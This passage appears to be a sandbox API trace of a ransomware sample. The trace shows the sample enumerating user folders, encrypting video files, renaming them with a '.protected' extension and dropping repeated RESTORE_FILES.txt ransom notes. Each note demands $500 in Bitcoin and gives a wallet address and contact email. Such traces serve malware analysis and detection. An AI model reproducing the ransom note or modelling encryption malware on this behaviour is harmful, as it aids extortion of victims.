SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.059] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.059] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.059] CloseHandle (hObject=0x150) returned 1 [0093.059] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi.protected") returned 110 [0093.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\tybh0dsvbmubd.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\tYbh0dSvbMUBd.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\tybh0dsvbmubd.avi.protected")) returned 1 [0093.060] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="Windows") returned -1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="Program Files") returned 1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="Program Files (x86)") returned 1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="$Recycle.bin") returned 1 [0093.060] lstrcmpiW (lpString1="uwylcPm_.mp4", lpString2="System Volume Information") returned 1 [0093.060] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4") returned 95 [0093.060] StrStrIW (lpFirst="uwylcPm_.mp4", lpSrch=".protected") returned 0x0 [0093.060] lstrcmpW (lpString1="uwylcPm_.mp4", lpString2="RESTORE_FILES.txt") returned 1 [0093.060] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.060] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\uwylcpm_.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.061] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4") returned 95 [0093.061] StrStrW (lpFirst="uwylcPm_.mp4", lpSrch=".txt") returned 0x0 [0093.061] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4") returned 95 [0093.061] StrStrW (lpFirst="uwylcPm_.mp4", lpSrch=".rar") returned 0x0 [0093.061] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4") returned 95 [0093.061] StrStrW (lpFirst="uwylcPm_.mp4", lpSrch=".zip") returned 0x0 [0093.061] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.062] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.062] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.062] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.062] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.062] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.062] CloseHandle (hObject=0x150) returned 1 [0093.062] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4.protected") returned 105 [0093.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\uwylcpm_.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\uwylcPm_.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\uwylcpm_.mp4.protected")) returned 1 [0093.063] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.063] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.063] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\RESTORE_FILES.txt") returned 100 [0093.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\VfPpB1ZPFMpD1GKT2Shf\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\vfppb1zpfmpd1gkt2shf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.065] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.065] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.066] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.066] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.066] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.066] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.066] CloseHandle (hObject=0x14c) returned 1 [0093.067] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="Windows") returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="Program Files") returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="Program Files (x86)") returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="$Recycle.bin") returned 1 [0093.067] lstrcmpiW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="System Volume Information") returned 1 [0093.067] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv") returned 80 [0093.067] StrStrIW (lpFirst="XSORR2-L7wU3Dy.mkv", lpSrch=".protected") returned 0x0 [0093.067] lstrcmpW (lpString1="XSORR2-L7wU3Dy.mkv", lpString2="RESTORE_FILES.txt") returned 1 [0093.067] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.067] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\xsorr2-l7wu3dy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv") returned 80 [0093.068] StrStrW (lpFirst="XSORR2-L7wU3Dy.mkv", lpSrch=".txt") returned 0x0 [0093.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv") returned 80 [0093.068] StrStrW (lpFirst="XSORR2-L7wU3Dy.mkv", lpSrch=".rar") returned 0x0 [0093.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv") returned 80 [0093.068] StrStrW (lpFirst="XSORR2-L7wU3Dy.mkv", lpSrch=".zip") returned 0x0 [0093.068] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.069] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.069] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.069] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.069] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.069] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.069] CloseHandle (hObject=0x14c) returned 1 [0093.070] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv.protected") returned 90 [0093.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\xsorr2-l7wu3dy.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\XSORR2-L7wU3Dy.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\xsorr2-l7wu3dy.mkv.protected")) returned 1 [0093.070] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.070] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.071] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\RESTORE_FILES.txt") returned 79 [0093.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.072] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.072] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.073] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.073] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.073] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.073] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0093.073] CloseHandle (hObject=0xd8) returned 1 [0093.073] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.073] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.074] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\RESTORE_FILES.txt") returned 74 [0093.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0093.076] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.076] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0093.077] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.077] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0093.077] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.077] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0093.077] CloseHandle (hObject=0xd4) returned 1 [0093.077] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.077] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.077] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\RESTORE_FILES.txt") returned 69 [0093.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0093.078] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to 